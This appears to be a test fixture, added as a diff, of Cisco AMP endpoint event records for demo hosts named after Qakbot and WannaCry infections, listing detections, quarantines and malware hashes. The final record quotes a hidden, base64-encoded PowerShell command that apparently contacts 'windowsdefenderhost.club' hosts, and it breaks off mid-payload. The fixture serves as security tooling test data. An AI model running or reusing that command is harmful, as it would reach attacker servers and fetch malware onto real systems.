+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":214000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411525251028484000,"timestamp":1610643578,"timestamp_nanoseconds":698000000,"date":"2021-01-14T16:59:38+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQ